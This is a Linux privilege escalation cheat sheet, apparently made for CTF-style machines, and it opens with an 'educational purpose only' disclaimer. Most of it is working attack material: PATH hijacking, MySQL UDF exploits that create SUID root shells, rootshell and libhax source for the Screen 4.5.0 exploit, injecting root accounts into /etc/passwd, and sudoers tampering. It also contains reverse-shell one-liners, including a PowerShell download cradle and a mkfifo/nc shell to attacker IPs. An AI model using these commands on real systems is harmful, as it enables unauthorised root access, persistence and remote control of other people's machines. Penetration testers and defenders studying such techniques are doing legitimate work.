THIS IS MERELY CREATED FOR EDUCATIONAL & ETHICAL PURPOSE ONLY, AUTHOR IS NOT RESPONSIBLE FOR ANY ILLEGAL ACTIVITIES DONE BY THE VISITORS
Linux Privilege Escalation Techniques
Binary PrivEsc
file binary
strings binary
cat binary
ls -la binary
Check the file to see if its executing any commands.
Check for the file paths;
If the command is cat instead of /bin/cat --> path injection might be possible
decrease the size of terminal and check for changes
less binary
./binary | less //Try Getting an Interactive shell with less
//Then !Command to execute the command, it might only work with a definite screen size
./binary anycommand && /bin/bash
Exploiting the Binary's Path Used in a Binary for example in a binary /usr/local/bin/devil (Has ROOT Privs) - there is a command which uses "cat" and calling a file from /home/freak ; cd /home/freak/ echo "/bin/sh" > cat export PATH=/home/freak:/freak:$PATH /usr/local/bin/devil /GET ROOT
Getting Root Using Mysql; When mysql is running as root -- Priv Esc
locate udf ///usr/lib/lib_mysqludf_sys.so --> this is essential for this exploit to work.
mysql -u root -p
select sys_exec('usermod -a -G admin john') //Giving root privileges
ctrl + C
sudo su //enter user password .. you are root now
Method II:
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
select sys_exec('chmod u+s /bin/bash');
ctrl + c
bash -p
Reference - Windows & Linux
Method - III -> Mysql 4.x - 5.x
searchsploit -m exploits/linux/local/1518.c
on Target Machine:
cd /tmp
wget http://192.168.0.2/1518.c
cp 1518.c raptor_udf2.c
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
mysql -u root -p
use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
//If this doesnt work try this --> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select * from mysql.func;
select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
\! sh
cat /tmp/out
exit
exit
cd /tmp
vi getroot.c //add the below content to this
int main()
{
setresuid(0, 0, 0);
setresgid(0, 0, 0);
system("/bin/bash");
return 0;
}
mysql -u root -p
select * from mysql.func;
//Creating a SUID Binary
select do_system('gcc -o /tmp/getroot /tmp/getroot.c');
select do_system('chmod u+s /tmp/getroot');
exit
exit
cd /tmp
./getroot
For Windows Follow This --> Github Exploit Video Tutorial
Postgresql Is Running As Root
psql -h 127.0.0.1 -d DB_NAME -U unixusrmgr //Enter Password later
\dt \\List Tables
\dp \\Get DB privileges
select * from table_name; \\ Check Home Directory (just in case)
Example to Update a value in all rows:
update table_name set gid=0 where gid=1001; \Giving Root Privs
or
insert into passwd_table (username,passwd,gid,homedir) values ('freak','openssl_encrypted password',0,'/');
Priv Esc When CAT is being used in system() function"
when an executable file is running cat in a system("cat /home/bhanu/root.txt"),
we can create a new path variable to our required directory, which results in
loading the last set path first and checks for the executable first in the last set
directory.
echo $PATH
// /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
echo "/bin/bash" > cat
chmod 777 cat
export PATH=/home/bhanu
echo $PATH
// /home/bhanu
./file_to_run /This file has the system() function with cat
#You get a new shell :) but as we deleted all the path variables - nothing will work,
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Priv Esc When NMAP Is running as root /usr/local/bin/nmap --interactive !sh
Priv Esc When wget is running as root
Copy the /etc/passwd from the target machine
On KALI:
paste the /etc/passwd from the target and add this line at the end.
bhanu:$1$freak$/IWD8R6aL2zyhUZPUeAXm.:0:0::/root:/bin/bash
on Target:
sudo wget -O /etc/passwd http://10.10.14.13/passwd
su bhanu
password
Priv Esc When Find is Running as root find /home -exec sh -i \;
Priv Esc when "Perl" is running as root
./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
Priv Esc When "PWD" is being used in a Binary
export PWD=\$\(/bin/bash\) //In the same directory as of the binary
Priv Esc with Spice Ports netstat -anlp | grep LIST 127.0.0.15900 127.0.0.15901 127.0.0.15902 //are running ps -ef | grep 5900 // shows what it is --> spice Port; libvert+ On Kali: remote-viewer // apt install virt-viewer proxychains remote-viewer spice://127.0.0.1:5900 proxychains remote-viewer spice://127.0.0.1:5901 proxychains remote-viewer spice://127.0.0.1:5902 when VNC opens --> send key --> ctrl+alt+del --> system reboots interrupt the process --> press e go to last but one line --> change "ro" to rw init=/bin/sh passwd //change the password sync
Priv Esc When /etc/passwd is World Writable
openssl passwd -1 -salt freak password
--> used to generate salted password for /etc/passwd file;
freak = salt
password = password
$1$freak$/IWD8R6aL2zyhUZPUeAXm. --> Hashed Password
username: Salted Value of username and password:0:0::root:/root:/bin/bash
--> create a new account with Root privileges
echo 'bhanu:$1$freak$/IWD8R6aL2zyhUZPUeAXm.:0:0::/root:/bin/bash' >>/etc/passwd
--> add this entry to /bin/passwd to get root access
su bhanu password: password
Priv Esc When /bin/bash or /bin/sh is SUID /bin/bash -p / -p == runs without changing privs /bin/sh -p / -p == runs without changing privs
Priv Esc when Snapd < 2.37.1 is running
snap version //Check for version - anything before 2.37.1 is vulnerable
Use this exploit // Creates a new account
su dirty_sock //password: dirty_sock
snap changes //See changes - if sudo doesnt work
Priv Esc When Screen 4.5.0 is running as Root
https://www.exploit-db.com/exploits/41154
save the below content into rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
gcc -o /tmp/rootshell /tmp/rootshell.c //Compile it
save the below content into libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c //Compile it
copy both the executable into /tmp directory in the target machine ..
Follow the below commands:
cd /etc
umask 000
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
screen -ls
/tmp/rootshell
When Wildcard is used in Sudo sudo -l //Wildcard example --> /home/*/*/file.txt (This case is vulnerable) /var/www/*/*/file.txt dpkg -l sudo //1.8.16 sudo is vulnerable searchsploit sudoedit searchsploit -m linux/local/37710.txt Exploitation: mkdir folder1 cd folder1 mkdir folder2 cd folder2 ln -s /home/username/.ssh/authorized_keys file.html //Create a symbolic link sudoedit -u username /var/www/folder1/folder2/file.html //add id-rsa.pub here OR sudoedit -u username /var/www/ .ssh/authorized_keys /file.html //text editor will open the text as 2 files, where .ssh/authorized_keys can be edited On Kali: ssh-keygen //Copy the id_rsa.pub to authorized_keys which is file.html ssh -i id_rsa username@IP_ADDRESS
Priv Esc for chkrootkit
cd /etc/crontab //chkrootkit is running
dpkg -l chkrootkit // chkrootkit 0.49-4ubuntu1.
searchsploit -m exploits/linux/local/33899.txt
cd /tmp
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
sudo su //After the crontab time, run this and get root :)
ssh [email protected] -t "/bin/bash" --> Escaping Limited Shell using ssh
Running Applications using SSH
ssh [email protected] "/usr/sbin/tcpdump -i ens33 -U -s0 -w - 'not port 22'" > network.cap
-s0 = capture everything; -w - = write the data; 'not port 22' = do not capture port 22 traffic
wireshark -k network.cap //-k = view the live traffic capture immediately.
ssh [email protected] "/usr/sbin/tcpdump -i lo -U -s0 -w - 'not port 22'" | wireshark -k -i -
//View Live Traffic
echo os.system("/bin/bash") --> Escaping Limited Shell using ssh
Connecting to SQL Server sqsh -S 10.10.10.59 -U username -P passaword xp_cmdshell 'whoami' /execute commands //If xp_commandshell is not turned on --> follow this EXEC SP_CONFIGURE 'show advanced options', 1 EXEC SP_CONFIGURE 'xp_cmdshell', 1 reconfigure go EXEC SP_CONFIGURE 'xp_cmdshell', 1 reconfigure go xp_cmdshell 'whoami' go Getting a Reverse Shell cp nishang/Shells/Invoke-PowerShellTcp.ps1 . Add this line at the end of the file & Save it Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.11 -Port 900 python -m SimpleHTTPServer 8001 nc -nvlp 9001 xp_cmdshell "powershell IEX(New-Object Net.webClient).DownloadString('http://10.10.14.11:8001/nishang.ps1')" we get shell on netcat connection
Priv Esc with Python Console import os os.popen("whoami").read() os.popen("find /etc | grep iptables").read() //Check for accessible ports to connect via reverse shell os.popen("base64 -w 0 /etc/iptables/rules.v4").read() //Read Files as Base64; Check the accessible ports os.popen("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.0.0.1 1234 >/tmp/f").read() //UDP Reverse Shell nc -u -nvlp 1234 //Get a UDP Shell
Priv Esc - Openssll capabilities: Read root files
getcap openssl /This should be "ep"
openssl enc -in "/etc/passwd"
openssl enc -in "/root/root.txt"
Getting a shell using Openssl
./openssl enc -in /etc/sudoers > sudoers
vi sudoers /add the below line in sudoers file. after root all(all) all
Username ALL=(ALL) ALL
cat ./sudoers | ./openssl enc -out /etc/sudoers
Let me know if I missed something important and You can find Windows Privilege Escalation Cheatsheet here